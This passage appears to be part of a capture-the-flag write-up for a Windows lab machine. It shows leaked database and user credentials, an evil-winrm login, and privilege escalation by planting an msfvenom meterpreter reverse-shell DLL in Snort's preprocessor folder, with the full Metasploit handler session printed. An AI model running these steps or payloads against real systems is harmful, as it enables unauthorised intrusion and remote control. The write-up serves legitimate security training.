HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\GPExtensions
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\UserDefaults
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\VolatileUserMgrKeyAdditionally, the MySQL credentials are found in the file c:\inetpub\internal\employees\login.php
db_master
0$TBO7H8s12yh&Use jdoe:7y4Z4^*y9Zzj credential to login with `, and retrieve the user flag.
> evil-winrm -i $target -u jdoe -p '7y4Z4^*y9Zzj'SYSTEM
Start from the evil-winrm shell and run winpeas64.exe. The tool reports a possible DLL hijacking issue related to the Snort service.
Searching for Snort vulnerabilities we find a CVE (https://www.cvedetails.com/cve/CVE-2016-1417) and an associated PoC here: https://packetstormsecurity.com/files/138915/Snort-2.9.7.0-WIN32-DLL-Hijacking.html
According to them, to exploit the vulnerability we are supposed to place in a remote shared folder a malicious tcapi.dll along with a .pcap capture file in the same folder. Then run Snort and let the application load the malicious DLL. Unfortunately, this procedure was tested and did not work.
Enumerating further in the Snort folder, we find a configuration file at C:\Snort\bin\snort.conf containing information about pre-processor libraries.
In summary, it seems Snort load first dynamic DLL's located at the pre-processor path c:\Snort\lib\snort_dynamicpreprocessor
Create an msfvenom payload for a malicious DLL called sf_engine.dll and copy to c:\snort\lib\snort_dynamicpreprocessor
> msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.xxx.xxx lport=1919 -f dll -a x64 --platform windows -o sf_engine.dllNow start a meterpreter handler and configure as needed.
> msfconsole -q
[*] Starting persistent handler(s)...
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set lhost tun0
lhost => 10.10.
msf6 exploit(multi/handler) > set lport 1919
lport => 1919
msf6 exploit(multi/handler) > exploitShortly after the DLL file is copied into the Snort pre-processor folder, a meterpreter session 1 is opened under the analysis\administrateur context.
You are root.
Last updated